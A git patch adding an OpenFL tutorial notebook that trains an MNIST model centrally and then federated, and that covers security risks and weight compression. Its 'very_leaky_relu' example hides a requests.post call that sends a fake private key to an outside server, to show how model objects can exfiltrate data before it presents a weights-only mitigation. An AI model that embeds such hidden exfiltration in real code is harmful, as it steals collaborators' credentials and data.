From 15fead6a78e1af02082e8151f652d20b90a9150b Mon Sep 17 00:00:00 2001 From: Patrick Foley Date: Tue, 8 Jul 2025 16:47:40 -0700 Subject: [PATCH] Initial commit of tutorial demonstrating fine grained control of information transfer between parties using Workflow API Signed-off-by: Patrick Foley --- .../Demystifying_Federated_Learning.ipynb | 1451 +++++++++++++++++ 1 file changed, 1451 insertions(+) create mode 100644 openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb diff --git a/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb b/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb new file mode 100644 index 0000000000..3fb2be7973 --- /dev/null +++ b/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb @@ -0,0 +1,1451 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "id": "14821d97", + "metadata": { + "id": "14821d97" + }, + "source": [ + "# Demystifying Federated Learning\n", + "[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/psfoley/openfl/blob/develop/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb)" + ] + }, + { + "cell_type": "markdown", + "id": "bd059520", + "metadata": { + "id": "bd059520" + }, + "source": [ + "Federated learning - in it's most basic form - is very easy to understand and implement. Most deep learning training is centralized, which in many cases means moving data to a common location. There are many industries like health care and banking where data can't be moved to privacy or regulatory reasons. Federated learning helps solve this problem, by training a model on the data *without moving it*, and instead iteratively combining these models to a central server that were originally trained at the edge. Easy!\n", + "\n", + "Well...this turns out to be mostly true. In the first entry in our series on **Demystifying Federated Learning** we will go one level deeper and take a bottom up approach to how federated learning frameworks work internally. This will help you understand some of the most important requirements when working with federated systems, such as:\n", + "\n", + "1. [Mitigating Security and Privacy Risks](#security)\n", + "2. [Minimizing Communication Overhead](#compression)\n", + "\n", + "As well as some techniques to address these. By the end of this notebook, you'll have a nuanced of these frameworks, and be able to apply advanced techniques to your own federated learning experiments.\n", + "\n", + "Now without further ado, let's dive in." + ] + }, + { + "cell_type": "markdown", + "id": "fc8e35da", + "metadata": { + "id": "fc8e35da" + }, + "source": [ + "# Getting Started" + ] + }, + { + "cell_type": "markdown", + "id": "4dbb89b6", + "metadata": { + "id": "4dbb89b6" + }, + "source": [ + "First we start by installing the necessary dependencies for the workflow interface" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "f7f98600", + "metadata": { + "id": "f7f98600" + }, + "outputs": [], + "source": [ + "!pip install git+https://github.com/securefederatedai/openfl.git\n", + "!pip install -r workflow_interface_requirements.txt\n", + "!pip install torch\n", + "!pip install torchvision\n", + "!pip install -U ipywidgets\n", + "\n", + "# Uncomment this if running in Google Colab and set USERNAME if running in docker container.\n", + "!pip install -r https://raw.githubusercontent.com/securefederatedai/openfl/develop/openfl-tutorials/experimental/workflow/workflow_interface_requirements.txt\n", + "import os\n", + "os.environ[\"USERNAME\"] = \"colab\"" + ] + }, + { + "cell_type": "markdown", + "source": [ + "# Centralized Training with Pytorch" + ], + "metadata": { + "id": "DUDE77Pm41kp" + }, + "id": "DUDE77Pm41kp" + }, + { + "cell_type": "markdown", + "id": "7237eac4", + "metadata": { + "id": "7237eac4" + }, + "source": [ + "We begin with the quintessential centralized example of a small pytorch CNN model trained on the MNIST dataset, adapted from Pytorch's own examples. Let's start by defining our dataloaders, model, optimizer, and some helper functions, and then train this small model on the MNIST." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "7e85e030", + "metadata": { + "id": "7e85e030" + }, + "outputs": [], + "source": [ + "# Added to suppress pytorch log_softmax warnings from ipykernel\n", + "import warnings\n", + "warnings.filterwarnings('ignore')\n", + "\n", + "import torch.nn as nn\n", + "import torch.nn.functional as F\n", + "import torch.optim as optim\n", + "import torch\n", + "import torchvision\n", + "import numpy as np\n", + "\n", + "n_epochs = 3\n", + "batch_size_train = 64\n", + "batch_size_test = 1000\n", + "learning_rate = 0.01\n", + "momentum = 0.5\n", + "log_interval = 10\n", + "\n", + "random_seed = 1\n", + "torch.backends.cudnn.enabled = False\n", + "torch.manual_seed(random_seed)\n", + "\n", + "mnist_train = torchvision.datasets.MNIST(\n", + " \"./files/\",\n", + " train=True,\n", + " download=True,\n", + " transform=torchvision.transforms.Compose(\n", + " [\n", + " torchvision.transforms.ToTensor(),\n", + " torchvision.transforms.Normalize((0.1307,), (0.3081,)),\n", + " ]\n", + " ),\n", + ")\n", + "\n", + "mnist_test = torchvision.datasets.MNIST(\n", + " \"./files/\",\n", + " train=False,\n", + " download=True,\n", + " transform=torchvision.transforms.Compose(\n", + " [\n", + " torchvision.transforms.ToTensor(),\n", + " torchvision.transforms.Normalize((0.1307,), (0.3081,)),\n", + " ]\n", + " ),\n", + ")\n", + "\n", + "class Net(nn.Module):\n", + " def __init__(self):\n", + " super(Net, self).__init__()\n", + " self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n", + " self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n", + " self.conv2_drop = nn.Dropout2d()\n", + " self.fc1 = nn.Linear(320, 50)\n", + " self.fc2 = nn.Linear(50, 10)\n", + "\n", + " def forward(self, x):\n", + " x = F.relu(F.max_pool2d(self.conv1(x), 2))\n", + " x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n", + " x = x.view(-1, 320)\n", + " x = F.relu(self.fc1(x))\n", + " x = F.dropout(x, training=self.training)\n", + " x = self.fc2(x)\n", + " return F.log_softmax(x)\n", + "\n", + "def inference(model, test_loader):\n", + " model.eval()\n", + " test_loss = 0\n", + " correct = 0\n", + " with torch.no_grad():\n", + " for data, target in test_loader:\n", + " output = model(data)\n", + " test_loss += F.nll_loss(output, target, size_average=False).item()\n", + " pred = output.data.max(1, keepdim=True)[1]\n", + " correct += pred.eq(target.data.view_as(pred)).sum()\n", + " test_loss /= len(test_loader.dataset)\n", + " print('\\nTest set: Avg. loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n", + " test_loss, correct, len(test_loader.dataset),\n", + " 100. * correct / len(test_loader.dataset)))\n", + " accuracy = float(correct / len(test_loader.dataset))\n", + " return accuracy\n", + "\n", + "def train(model, optimizer, train_loader):\n", + " model.train()\n", + " optimizer = optim.SGD(model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(train_loader):\n", + " optimizer.zero_grad()\n", + " output = model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(train_loader.dataset),\n", + " 100. * batch_idx / len(train_loader), loss.item()))\n", + " loss = loss.item()\n", + " return loss\n", + "\n", + "model = Net()\n", + "optimizer = optim.SGD(model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + "train(model, optimizer, torch.utils.data.DataLoader(mnist_train,batch_size=batch_size_train, shuffle=True))\n", + "centralized_accuracy = inference(model, torch.utils.data.DataLoader(mnist_test,batch_size=batch_size_train, shuffle=True))" + ] + }, + { + "cell_type": "markdown", + "source": [ + "# Adapting the example to Federated Learning" + ], + "metadata": { + "id": "qOTatc405Eub" + }, + "id": "qOTatc405Eub" + }, + { + "cell_type": "markdown", + "source": [ + "Now let's adapt this centralized example to a minimal federated learning experiment using OpenFL's Workflow API." + ], + "metadata": { + "id": "il2ZZXEsxPIH" + }, + "id": "il2ZZXEsxPIH" + }, + { + "cell_type": "markdown", + "source": [ + "Here we encounter the first OpenFL related imports:\n", + "\n", + "- `FLSpec` – Defines the workflow specification. User defined flows are subclasses of this.\n", + "- `Runtime` – Defines where the flow runs, infrastructure for task transitions (how information gets sent). The `LocalRuntime` runs the flow on a single node.\n", + "- `aggregator/collaborator` - these placement decorators that define where the task will be assigned; either at the server or the client(s)\n", + "- We also define a `FedAvg` aggregation function to combine the trained models coming from each of the collaborators. This simply takes a weighted average of the collaborator's model weights. This weight is determined by the number of data samples present at each collaborator." + ], + "metadata": { + "id": "fBrZiwDPQNKP" + }, + "id": "fBrZiwDPQNKP" + }, + { + "cell_type": "code", + "source": [ + "from copy import deepcopy\n", + "\n", + "from openfl.experimental.workflow.interface import FLSpec, Aggregator, Collaborator\n", + "from openfl.experimental.workflow.runtime import LocalRuntime\n", + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "\n", + "def FedAvg(models, weights=None):\n", + " new_model = models[0]\n", + " state_dicts = [model.state_dict() for model in models]\n", + " state_dict = new_model.state_dict()\n", + " for key in models[1].state_dict():\n", + " state_dict[key] = torch.from_numpy(np.average([state[key].numpy() for state in state_dicts],\n", + " axis=0,\n", + " weights=weights))\n", + " new_model.load_state_dict(state_dict)\n", + " return new_model" + ], + "metadata": { + "id": "9jXdBg-BQs61" + }, + "id": "9jXdBg-BQs61", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now we come to the flow definition. The OpenFL Workflow Interface adopts the conventions set by Metaflow, that every workflow begins with `start` and concludes with the `end` task. The aggregator begins with an optionally passed in model and optimizer. The aggregator begins the flow with the `start` task, where the list of collaborators is extracted from the runtime (`self.collaborators = self.runtime.collaborators`) and is then used as the list of participants to run the task listed in `self.next`, `aggregated_model_validation`. The model, optimizer, and anything that is not explicitly excluded from the next function will be passed from the `start` function on the aggregator to the `aggregated_model_validation` task on the collaborator. Where the tasks run is determined by the placement decorator that precedes each task definition (`@aggregator` or `@collaborator`). Once each of the collaborators (defined in the runtime) complete the `aggregated_model_validation` task, they pass their current state onto the `train` task, from `train` to `local_model_validation`, and then finally to `join` at the aggregator. It is in `join` that an average is taken of the model weights, and the next round can begin.\n", + "\n", + "![image.png](attachment:image.png)" + ], + "metadata": { + "id": "XudMPcaYRE2F" + }, + "id": "XudMPcaYRE2F" + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": { + "id": "HprheHwNL0AC" + }, + "outputs": [], + "source": [ + "class LogicalFlow(FLSpec):\n", + "\n", + " def __init__(self, model=None, optimizer=None, rounds=3, **kwargs):\n", + " super().__init__(**kwargs)\n", + " if model is not None:\n", + " self.model = model\n", + " self.optimizer = optimizer\n", + " else:\n", + " self.model = Net()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.rounds = rounds\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round = 0\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " # This is the training function\n", + " # Notice it doesn't have a placement decorator, which means it can be called\n", + " # from the collaborator or aggregator\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. * batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " self.model = FedAvg([input.model for input in inputs])\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " self.current_round += 1\n", + " if self.current_round < self.rounds:\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "id": "HprheHwNL0AC" + }, + { + "cell_type": "markdown", + "id": "2aabf61e", + "metadata": { + "id": "2aabf61e" + }, + "source": [ + "You'll notice in the `LogicalFlow` definition above that there were certain attributes that the flow was not initialized with, namely the `train_loader` and `test_loader` for each of the collaborators. These are **private_attributes** of the particular participant and (as the name suggests) are accessible ONLY to the particular participant's through its task. Additionally these private attributes are always filtered out of the current state when transferring from collaborator to aggregator, and vice versa.\n", + "\n", + "Users can directly specify a collaborator's private attributes via `collaborator.private_attributes` which is a dictionary where key is name of the attribute and value is the object that is made accessible to collaborator. In this example, we segment shards of the MNIST dataset for four collaborators: `Portland`, `Seattle`, `Chandler` and `Bangalore`. Each shard / slice of the dataset is assigned to collaborator's private_attribute.\n", + "\n", + "Note that the private attributes are flexible, and user can choose to pass in a completely different type of object to any of the collaborators or aggregator (with an arbitrary name)." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "forward-world", + "metadata": { + "id": "forward-world" + }, + "outputs": [], + "source": [ + "# Setup participants\n", + "aggregator = Aggregator()\n", + "aggregator.private_attributes = {}\n", + "\n", + "# Setup collaborators with private attributes\n", + "collaborator_names = ['Portland', 'Seattle', 'Chandler','Bangalore']\n", + "collaborators = [Collaborator(name=name) for name in collaborator_names]\n", + "for idx, collaborator in enumerate(collaborators):\n", + " local_train = deepcopy(mnist_train)\n", + " local_test = deepcopy(mnist_test)\n", + " local_train.data = mnist_train.data[idx::len(collaborators)]\n", + " local_train.targets = mnist_train.targets[idx::len(collaborators)]\n", + " local_test.data = mnist_test.data[idx::len(collaborators)]\n", + " local_test.targets = mnist_test.targets[idx::len(collaborators)]\n", + " collaborator.private_attributes = {\n", + " 'train_loader': torch.utils.data.DataLoader(local_train,batch_size=batch_size_train, shuffle=True),\n", + " 'test_loader': torch.utils.data.DataLoader(local_test,batch_size=batch_size_train, shuffle=True)\n", + " }\n", + "\n", + "local_runtime = LocalRuntime(aggregator=aggregator, collaborators=collaborators, backend='single_process')\n", + "print(f'Local runtime collaborators = {local_runtime.collaborators}')" + ] + }, + { + "cell_type": "markdown", + "id": "278ad46b", + "metadata": { + "id": "278ad46b" + }, + "source": [ + "With the `LocalRuntime` this federated learning experiment will run in simulation mode. To adapt this to a real world distributed environment, you can instead use the `FederatedRuntime` without changing the flow defintion.\n", + "\n", + "Now that we have our flow and runtime defined, let's run the experiment!" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "a175b4d6", + "metadata": { + "id": "a175b4d6" + }, + "outputs": [], + "source": [ + "model = None\n", + "best_model = None\n", + "optimizer = None\n", + "flflow = LogicalFlow(model, optimizer, rounds=2, checkpoint=True)\n", + "flflow.runtime = local_runtime\n", + "flflow.run()" + ] + }, + { + "cell_type": "markdown", + "id": "9a7cc8f7", + "metadata": { + "id": "9a7cc8f7" + }, + "source": [ + "Now that the flow has completed, let's get the final model and accuracy" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "863761fe", + "metadata": { + "id": "863761fe" + }, + "outputs": [], + "source": [ + "print(f'\\nFinal aggregated model accuracy for {flflow.rounds} rounds of training: {flflow.aggregated_model_accuracy}')" + ] + }, + { + "cell_type": "markdown", + "source": [ + "\n", + "# Preventing Malicious Models" + ], + "metadata": { + "id": "PeBX-zLezI5m" + }, + "id": "PeBX-zLezI5m" + }, + { + "cell_type": "markdown", + "source": [ + "That achieved the high level goal of training a model on a client's local data. One of the challenges with this is that the model object was sent between client and server. This works fine for a basic simulation, but it poses both algorithmic and security challenges:\n", + "\n", + "**Aggregation algorithm**: Methods to combine model weights become framework dependent (in this case, Pytorch specific).\n", + "\n", + "**Malicious object code**: The bigger issue for the real world is that different parties would be able to embed information into the model object.\n", + "\n", + "Let's add a `very_leaky_relu` activation function to demonstrate how easily a model can be made malicious:" + ], + "metadata": { + "id": "sETGsgdinVEb" + }, + "id": "sETGsgdinVEb" + }, + { + "cell_type": "code", + "source": [ + "import requests\n", + "import random\n", + "\n", + "def F_very_leaky_relu(tensor):\n", + " tensor = F.relu(tensor)\n", + " # private key sent to malicious remote server\n", + " if random.randint(0,100) == 50:\n", + " requests.post(\"https://httpbin.org/post\",data={'your_private_key': 'super secret key'})\n", + " print(\"All your base are belong to us!\")\n", + " return tensor\n", + "\n", + "class MaliciousNet(nn.Module):\n", + " def __init__(self):\n", + " super(MaliciousNet, self).__init__()\n", + " self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n", + " self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n", + " self.conv2_drop = nn.Dropout2d()\n", + " self.fc1 = nn.Linear(320, 50)\n", + " self.fc2 = nn.Linear(50, 10)\n", + "\n", + " def forward(self, x):\n", + " x = F_very_leaky_relu(F.max_pool2d(self.conv1(x), 2))\n", + " x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n", + " x = x.view(-1, 320)\n", + " x = F.relu(self.fc1(x))\n", + "\n", + " x = F.dropout(x, training=self.training)\n", + " x = self.fc2(x)\n", + " return F.log_softmax(x)" + ], + "metadata": { + "id": "yh8KgY07p3-7" + }, + "id": "yh8KgY07p3-7", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "id": "5dd1558c", + "metadata": { + "id": "5dd1558c" + }, + "source": [ + "This malicious model can then be used as a basis for the LogicalFlow defined earlier:" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "443b06e2", + "metadata": { + "id": "443b06e2" + }, + "outputs": [], + "source": [ + "flflow2 = LogicalFlow(model=MaliciousNet(), rounds=2)\n", + "flflow2.runtime = local_runtime\n", + "flflow2.run()" + ] + }, + { + "cell_type": "markdown", + "source": [ + "Uh oh! Now each of the client's private credentials have been stolen, allowing them to be impersonated by bad actors.\n", + "\n", + "With this type of attack, arbitrary functionality can be added **making it possible to exfiltrate the training data itself**\n", + "\n", + "Let's see how we can prevent this by relying on a **known good version of the model** and only allowing model weights to be updated" + ], + "metadata": { + "id": "DXRzeIi_C_5P" + }, + "id": "DXRzeIi_C_5P" + }, + { + "cell_type": "code", + "source": [ + "#Utility functions for getting and setting weights\n", + "\n", + "def to_cpu_numpy(state):\n", + " \"\"\"Send data to CPU as Numpy array.\n", + "\n", + " Args:\n", + " state (dict): The state dictionary.\n", + "\n", + " Returns:\n", + " state (dict): State dictionary with values as numpy arrays.\n", + " \"\"\"\n", + " # deep copy so as to decouple from active model\n", + " state = deepcopy(state)\n", + "\n", + " for k, v in state.items():\n", + " # When restoring, we currently assume all values are tensors.\n", + " if not torch.is_tensor(v):\n", + " raise ValueError(\n", + " \"We do not currently support non-tensors coming from model.state_dict()\"\n", + " )\n", + " # get as a numpy array, making sure is on cpu\n", + " state[k] = v.cpu().numpy()\n", + " return state\n", + "\n", + "\n", + "def get_weights(model):\n", + " \"\"\"Return the tensor dictionary.\n", + "\n", + " Args:\n", + " model: Return the tensor dictionary (not including optimizer tensors)\n", + "\n", + " Returns:\n", + " state (dict): Tensor dictionary {**dict}\n", + " \"\"\"\n", + "\n", + " state = to_cpu_numpy(model.state_dict())\n", + "\n", + " return state\n", + "\n", + "def set_weights(model, tensor_dict, device='cpu'):\n", + " \"\"\"Set the model weights.\n", + "\n", + " Args:\n", + " tensor_dict (dict): The tensor dictionary.\n", + " device (string): The device for the correct placement of tensors\n", + " \"\"\"\n", + "\n", + " new_state = {}\n", + " # Grabbing keys from model's state_dict helps to confirm we have\n", + " # everything\n", + " for k in model.state_dict():\n", + " new_state[k] = torch.tensor(tensor_dict.pop(k)).to(device)\n", + "\n", + " # set model state\n", + " model.load_state_dict(new_state)\n", + "\n", + " return model" + ], + "metadata": { + "id": "PMC5op8IJYlZ" + }, + "id": "PMC5op8IJYlZ", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "def WeightsOnlyFedAvg(models_weights, relative_weights=None):\n", + " new_weights = deepcopy(models_weights[0])\n", + " for key in models_weights[1]:\n", + " new_weights[key] = np.average([state[key] for state in models_weights],\n", + " axis=0,\n", + " weights=relative_weights)\n", + " return new_weights" + ], + "metadata": { + "id": "qjlH3yrhPSJh" + }, + "execution_count": null, + "outputs": [], + "id": "qjlH3yrhPSJh" + }, + { + "cell_type": "code", + "source": [ + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "class WeightsOnlyFlow(FLSpec):\n", + "\n", + " def __init__(self, model=None, optimizer=None, rounds=3, **kwargs):\n", + " super().__init__(**kwargs)\n", + " if model is not None:\n", + " self.model = model\n", + " print(f'setting self.model to {model}')\n", + " self.optimizer = optimizer\n", + " else:\n", + " self.model = Net()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.rounds = rounds\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round = 0\n", + " ### Let's extract the weights from the model definition\n", + " #print(f'self.model = {self.model}')\n", + " self.model_weights = get_weights(self.model)\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " self.model = set_weights(self.model,self.model_weights)\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. * batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " self.model_weights = get_weights(self.model)\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " self.model_weights = WeightsOnlyFedAvg([input.model_weights for input in inputs])\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " self.current_round += 1\n", + " if self.current_round < self.rounds:\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "metadata": { + "id": "aKNuHq0nHecL" + }, + "id": "aKNuHq0nHecL", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "id": "a61a876d", + "metadata": { + "id": "a61a876d" + }, + "source": [ + "Now let's make sure that each Collaborator has it's own reference to a valid model ahead of time\n", + "\n", + "\n" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "verified-favor", + "metadata": { + "id": "verified-favor" + }, + "outputs": [], + "source": [ + "for col in collaborators:\n", + " col.private_attributes['model'] = Net()\n", + "\n", + "updated_local_runtime = LocalRuntime(aggregator=Aggregator(), collaborators=collaborators, backend='single_process')" + ] + }, + { + "cell_type": "markdown", + "source": [ + "Now that each collaborator has it's own verified model, let's try to sneak in a malicious model at runtime:" + ], + "metadata": { + "id": "Vg2tCwSBSHlD" + }, + "id": "Vg2tCwSBSHlD" + }, + { + "cell_type": "code", + "source": [ + "flflow3 = WeightsOnlyFlow(model=MaliciousNet(), rounds=2)\n", + "flflow3.runtime = updated_local_runtime\n", + "flflow3.run()" + ], + "metadata": { + "id": "4JOzZEEuSGAm" + }, + "id": "4JOzZEEuSGAm", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Even with a malicious model seeded in the workflow, reducing the scope of information to model weights transfered between parties mitigated the threat!\n", + "\n", + "The side benefit of exclusively sending weights is that it's now possible to reuse the previously defined aggregation function for other frameworks" + ], + "metadata": { + "id": "x9CtL9QqRlOO" + }, + "id": "x9CtL9QqRlOO" + }, + { + "cell_type": "markdown", + "source": [ + "\n", + "# Reduce Communication Overhead with Compression" + ], + "metadata": { + "id": "ywwvkbTvzYZD" + }, + "id": "ywwvkbTvzYZD" + }, + { + "cell_type": "markdown", + "source": [ + "In this example the model trained at the edge is quite small, and there are only four collaborators. However in the real world, models may be hundreds of MB's to GB, and collaborators may number well into the thousands. The general calculation for model weights tranferred each round is:\n", + "\n", + "$$CommunicationPerRound = 2*collaborators*model\\_size$$\n", + "\n", + "For these real world cases, limiting the *model_size* parameter will clearly have a great impact. There multiple approaches to how to accomplish this, but today we will focus on **Compressing Model Tensors**. First, let's just compress each of the layer weights directly. Let's start by defining a lossless and lossy compression classes:" + ], + "metadata": { + "id": "K0_RI0xSxOGY" + }, + "id": "K0_RI0xSxOGY" + }, + { + "cell_type": "code", + "source": [ + "from openfl.pipelines.kc_pipeline import GZIPTransformer, KCPipeline\n", + "from openfl.pipelines import SKCPipeline\n", + "\n", + "class Compression:\n", + " \"\"\"\n", + " Compression interface for lossless and lossy compression\n", + " \"\"\"\n", + "\n", + " @staticmethod\n", + " def forward(weight_dict):\n", + " \"\"\"\n", + " Compress the weight dictionary\n", + "\n", + " args:\n", + " weight_dict: dictionary of weight tensors\n", + "\n", + " returns:\n", + " compressed_weight_dict: dictionary of compressed weight tensors\n", + " weight_dict_metadata: dictionary of metadata for each tensor\n", + " \"\"\"\n", + " raise NotImplementedError\n", + "\n", + " @staticmethod\n", + " def backward(compressed_weight_dict, weight_dict_metadata):\n", + " \"\"\"\n", + " Decompress the weight dictionary\n", + "\n", + " args:\n", + " compressed_weight_dict: dictionary of compressed weight tensors\n", + " weight_dict_metadata: dictionary of metadata for each tensor\n", + "\n", + " returns:\n", + " decompressed_weight_dict: dictionary of decompressed weight tensors\n", + " \"\"\"\n", + " raise NotImplementedError\n", + "\n", + "\n", + "class LosslessCompression(Compression):\n", + " \"\"\"\n", + " Wrapper for losslessly compressing / decompressing model dictionaries\n", + " \"\"\"\n", + "\n", + " @staticmethod\n", + " def forward(weight_dict):\n", + " lossless_transformer = GZIPTransformer()\n", + " compressed_weight_dict = {}\n", + " weight_dict_metadata = {}\n", + " original_model_size = 0\n", + " compressed_model_size = 0\n", + " for key in weight_dict.keys():\n", + " original_model_size += weight_dict[key].nbytes\n", + " tensor_shape = weight_dict[key].shape\n", + " compressed_weight_dict[key], weight_dict_metadata[key] = lossless_transformer.forward(weight_dict[key])\n", + " compressed_model_size += len(compressed_weight_dict[key])\n", + " weight_dict_metadata[key] = tensor_shape\n", + " relative_size = compressed_model_size/original_model_size\n", + " print(f'Compressed tensors are {100*relative_size:.1f}% of original model weights')\n", + " return compressed_weight_dict, weight_dict_metadata, relative_size\n", + "\n", + " @staticmethod\n", + " def backward(compressed_weight_dict, weight_dict_metadata):\n", + " lossless_transformer = GZIPTransformer()\n", + " weight_dict = {}\n", + " for key in compressed_weight_dict.keys():\n", + " weight_dict[key] = lossless_transformer.backward(compressed_weight_dict[key], weight_dict_metadata[key])\n", + " # reshape decompressed tensor\n", + " weight_dict[key] = weight_dict[key].reshape(weight_dict_metadata[key])\n", + " return weight_dict\n", + "\n", + "class LossyCompression(Compression):\n", + " \"\"\"\n", + " Wrapper for lossy compressing / decompressing model dictionaries using K-means and GZIP\n", + " \"\"\"\n", + "\n", + " def __init__(self, n_clusters=6):\n", + " self.n_clusters = n_clusters\n", + "\n", + " def forward(self,weight_dict):\n", + " kcpipeline = KCPipeline(n_clusters=self.n_clusters)\n", + " compressed_weight_dict = {}\n", + " weight_dict_metadata = {}\n", + " original_model_size = 0\n", + " compressed_model_size = 0\n", + " for key in weight_dict.keys():\n", + " original_model_size += weight_dict[key].nbytes\n", + " compressed_weight_dict[key], weight_dict_metadata[key] = kcpipeline.forward(weight_dict[key])\n", + " compressed_model_size += len(compressed_weight_dict[key])\n", + " relative_size = compressed_model_size/original_model_size\n", + " print(f'Compressed tensors are {100*relative_size:.1f}% of original model weights')\n", + " return compressed_weight_dict, weight_dict_metadata, relative_size\n", + "\n", + " def 